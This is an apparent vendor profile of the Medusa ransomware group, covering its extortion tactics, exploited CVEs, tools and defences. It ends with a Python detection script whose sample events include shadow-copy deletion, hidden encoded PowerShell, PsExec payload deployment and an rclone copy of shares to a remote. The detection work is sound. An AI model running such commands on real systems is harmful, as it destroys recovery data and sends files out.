Threat Actor Profile

Medusa

The Medusa ransomware group has been making waves since late 2021, operating a Ransomware-as-a-Service (RaaS) model. These actors use double-extortion, meaning they don't just encrypt your data—they steal it first and threaten to leak it on their dark web site. It's a nasty one-two punch designed to maximize pressure.

Country of Origin

The exact country of origin for Medusa is unknown. Like many ransomware groups, they operate with a high degree of anonymity, making attribution a tough nut to crack.

Members

Information about Medusa's group size or member aliases is not publicly available. They are known to recruit initial access brokers (IABs) from cybercriminal forums to gain entry into victim networks, offering payments ranging from $100 to over $1 million.

Leadership

The leadership structure and specific aliases of Medusa's core developers are currently unknown. Ransom negotiations appear to be centrally controlled by the main group, even within their affiliate-based RaaS model.

Medusa TTPs

Tactics

Medusa's primary goals are financial gain through extortion and disruption. They accomplish this through a double-extortion model:

  1. Data Exfiltration: They steal sensitive data from victims' networks before encryption.

  2. Data Encryption: They encrypt critical files, rendering systems and services unusable.

  3. Extortion: They demand a ransom payment for the decryption key and to prevent the public release of the stolen data on their data leak site (DLS). They even offer to extend the data leak countdown for a daily fee of $10,000. Yikes.

Techniques

So, how do they pull this off? Medusa actors are big fans of using what's already there, a technique known as "living-off-the-land" (LotL). This helps them blend in and avoid detection.

  • Initial Access: They often get their foot in the door by exploiting unpatched vulnerabilities in public-facing applications like Microsoft Exchange, ScreenConnect (CVE-2024-1709), and Fortinet (CVE-2023-48788). Phishing campaigns are also a go-to method for snatching credentials.

  • Discovery & Lateral Movement: Once inside, they use legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner to map out the network. They move across the network using Remote Desktop Protocol (RDP) and legitimate remote access tools like AnyDesk, ConnectWise, and SimpleHelp.

  • Defense Evasion: Medusa actors use a "Bring Your Own Vulnerable Driver" (BYOVD) technique to disable security software. They deploy a signed, vulnerable driver to kill EDR and antivirus processes. They also use PowerShell with obfuscated and base64-encoded commands to fly under the radar.

Procedures

Medusa's playbook is pretty consistent, which might mean they either have a small, tight-knit group of affiliates or provide a very specific set of instructions.

  • Credential Dumping: They use tools like Mimikatz to pull credentials from memory (LSASS dumping), giving them the keys to move around the network freely.

  • Data Exfiltration: The tool of choice for smuggling data out is often Rclone, a command-line program for managing files on cloud storage.

  • Payload Deployment: They use legitimate software deployment tools like PsExec and PDQ Deploy to push their ransomware payload, gaze.exe, across the network. Before encrypting, this payload terminates security services and backup processes, and deletes volume shadow copies to prevent easy recovery.

Notable Cyberattacks

Medusa has been relentlessly active, with a significant spike in attacks observed throughout 2024 and 2025. While many victims go unnamed, the group has publicly listed hundreds of organizations on its leak site.

One documented attack in January 2025 targeted a U.S. healthcare organization, compromising several hundred machines. The attackers used a combination of SimpleHelp, Mesh Agent, and AnyDesk for remote access and deployed PDQ Deploy to distribute the ransomware. This incident highlighted their consistent use of legitimate tools to orchestrate a widespread attack, from initial staging to final encryption.


Law Enforcement & Arrests

As of now, there have been no major, publicly announced law enforcement actions, arrests, or infrastructure takedowns specifically targeting the Medusa ransomware group. However, agencies like the FBI and CISA are actively tracking their activities and have issued joint cybersecurity advisories to help organizations defend against their TTPs.

How to Defend Against Medusa

  1. Patch, Patch, Patch: Medusa loves exploiting known vulnerabilities. Keep your operating systems, software (especially public-facing ones!), and firmware updated. Prioritize patches for known exploited vulnerabilities.

  2. Enforce MFA: Require multifactor authentication for everything possible, especially for remote access, webmail, and critical system accounts.

  3. Segment Your Network: Control traffic flow between subnetworks to limit an attacker's ability to move laterally. If they get into one part of your network, don't let them have the keys to the whole kingdom.

  4. Restrict & Monitor Tools: Disable unnecessary ports and scripting tools like PowerShell where they aren't needed. Monitor for abnormal use of legitimate software like PsExec, RDP, and other remote admin tools.

  5. Backup Your Data: Maintain offline, encrypted, and immutable backups. Test your restoration process regularly to ensure you can recover quickly if the worst happens.
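As an added detection example (written here, not code from Huntress or from the profile itself): a small Python triage pass over constructed process-creation events that flags the behaviours the Techniques and Procedures sections describe and that step 4 tells you to monitor. It decodes the base64/UTF-16LE payload of an encoded PowerShell command so the analyst sees the actual script, spots volume shadow copy deletion, and surfaces PsExec and Rclone executions for review. The event format, hostname, and service name are constructed for the sample.

```python
import base64
import re

# Constructed process-creation events, flattened to "image|command line" (the
# fields a Sysmon Event ID 1 or Windows 4688 record boils down to). Not real telemetry.
ENCODED_SAMPLE = base64.b64encode(
    "Stop-Service -Name 'ExampleBackupSvc' -Force".encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    r"C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs -p",
    r"C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    "powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE,
    r"C:\Temp\PsExec.exe|PsExec.exe \\FILESRV01 -c gaze.exe",
    r"C:\Users\Public\rclone.exe|rclone.exe copy D:\Shares remote:bucket -q",
    r"C:\Windows\System32\notepad.exe|notepad.exe report.txt",
]

# -EncodedCommand and the abbreviations PowerShell accepts; -ExecutionPolicy does not match.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
SHADOW_DELETE = re.compile(r"(?i)\bvssadmin(?:\.exe)?\s+delete\s+shadows\b|\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b")
# Legitimate admin tools the profile names; a hit is a lead to triage, not proof of compromise.
WATCHED_TOOLS = {"psexec.exe": "remote_execution_tool", "psexesvc.exe": "remote_execution_tool",
                 "rclone.exe": "cloud_sync_tool"}

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None when absent or not valid base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_event(event):
    """Return a list of {"rule", "detail"} findings for one flattened event."""
    image, _, cmdline = event.partition("|")
    name = image.rsplit("\\", 1)[-1].lower()
    findings = []
    if name in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:  # surface the decoded script so the analyst sees the intent
            findings.append({"rule": "encoded_powershell", "detail": decoded})
    if SHADOW_DELETE.search(cmdline):
        findings.append({"rule": "shadow_copy_deletion", "detail": cmdline})
    if name in WATCHED_TOOLS:
        findings.append({"rule": WATCHED_TOOLS[name], "detail": cmdline})
    return findings
```

Run `triage_event` over each line of your own process telemetry; the shadow-copy rule is high confidence, while the PsExec and Rclone rules need baselining against normal admin activity.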

Huntress solutions help protect organizations by monitoring endpoints, detecting intrusions, and mitigating Medusa threats with enterprise-grade technology.

